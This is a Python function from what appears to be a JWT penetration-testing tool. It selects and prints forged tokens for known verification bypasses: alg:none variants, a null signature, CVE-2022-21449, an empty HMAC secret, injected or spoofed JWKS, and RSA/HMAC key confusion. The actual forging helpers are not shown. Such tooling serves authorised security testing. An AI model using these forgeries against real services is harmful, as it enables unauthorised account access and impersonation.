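def runExploits():
    """Run the single exploit selected by ``args.exploit`` and print the forged token(s).

    Every branch builds a token from the module-level parsed input
    (``headDict``/``paylDict``/``paylB64``/``contents``) and hands it to
    ``jwtOut`` with a label and a description; nothing is returned. Each
    description carries the same caveat: the token is only accepted by a
    verifier that is unpatched or misconfigured, so a generated token is a
    test case, not a confirmed finding.

    Exploit letters:
      a  ``alg:none`` in four capitalisations (presumably to slip past
         case-sensitive alg checks)
      n  null signature
      p  "Psychic Signature" bypass (CVE-2022-21449)
      b  HS256 signed with an empty secret
      i  JWKS injected into the token (``jwksEmbed``)
      s  token signed against the JWKS exported to the configured jku location
      k  key-confusion: the RSA public key (``-pk``) used as the HMAC secret

    Does nothing when ``args.exploit`` is unset. An unrecognised letter prints
    an error and the usage text rather than failing silently (argparse may
    already reject it upstream; this is a defensive fallback).
    """
    if not args.exploit:
        return
    exploit = args.exploit
    # Shared caveat appended to every exploit description (byte-identical to the
    # original wording so downstream tooling that greps for it still matches).
    unpatched = "\n(This will only be valid on unpatched implementations of JWT.)"

    if exploit == "a":
        noneToks = checkAlgNone(headDict, paylB64)
        algVariants = ["\"alg\":\"none\"", "\"alg\":\"None\"", "\"alg\":\"NONE\"", "\"alg\":\"nOnE\""]
        # checkAlgNone is expected to return one token per variant, in this
        # order; zip silently truncates if the counts ever diverge -- TODO
        # confirm against the helper.
        for noneTok, variant in zip(noneToks, algVariants):
            desc = "EXPLOIT: "+variant+" - this is an exploit targeting the debug feature that allows a token to have no signature"+unpatched
            jwtOut(noneTok, "Exploit: "+variant, desc)
    elif exploit == "n":
        jwtNull = checkNullSig(contents)
        jwtOut(jwtNull, "Exploit: Null signature", "EXPLOIT: null signature"+unpatched)
    elif exploit == "p":
        jwtPsy = checkPsySig(headDict, paylB64)
        desc = "EXPLOIT: Psychic Signature (CVE-2022-21449)"+unpatched
        jwtOut(jwtPsy, "Exploit: Psychic Signature (CVE-2022-21449)", desc)
    elif exploit == "b":
        # Empty secret: some verifiers accept an HMAC computed over "" as valid.
        newSig, newContents = signTokenHS(headDict, paylDict, "", 256)
        desc = "EXPLOIT: Blank password accepted in signature"+unpatched
        jwtOut(newContents+"."+newSig, "Exploit: Blank password accepted in signature", desc)
    elif exploit == "i":
        newSig, newContents = jwksEmbed(headDict, paylDict)
        jwtOut(newContents+"."+newSig, "Injected JWKS", "EXPLOIT: injected JWKS"+unpatched)
    elif exploit == "s":
        # A static jwksloc wins; otherwise the tool's dynamic JWKS location is used.
        # Whether the target actually fetches that URL is the target's decision --
        # this branch only signs against it.
        jwksloc = config['services']['jwksloc']
        jku = jwksloc if jwksloc else config['services']['jwksdynamic']
        newContents, newSig = exportJWKS(jku)
        # Re-read rather than reuse jwksloc, in case exportJWKS updated config.
        if config['services']['jwksloc'] and config['services']['jwksloc'] == args.jwksurl:
            # NOTE(review): the JWKS path is printed twice here; the second term
            # looks like it was meant to be the JWKS body -- confirm before changing.
            cprintc("Paste this JWKS into a file at the following location before submitting token request: "+jku+"\n(JWKS file used: "+config['crypto']['jwks']+")\n"+str(config['crypto']['jwks']), "cyan")
        jwtOut(newContents+"."+newSig, "Spoof JWKS", "Signed with JWKS at "+jku)
    elif exploit == "k":
        pubkey = config['crypto']['pubkey']
        if not pubkey:
            cprintc("No Public Key provided (-pk)\n", "red")
            parser.print_usage()
            return
        newTok, newSig = checkPubKeyExploit(headDict, paylB64, pubkey)
        desc = "EXPLOIT: Key-Confusion attack (signing using the Public Key as the HMAC secret)"+unpatched
        jwtOut(newTok+"."+newSig, "RSA Key Confusion Exploit", desc)
    else:
        # Same error style as the missing -pk case above.
        cprintc("Unknown exploit option: "+str(exploit)+"\n", "red")
        parser.print_usage()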
| 1784 | |
| 1785 | def runActions(): |
| 1786 | if args.tamper: |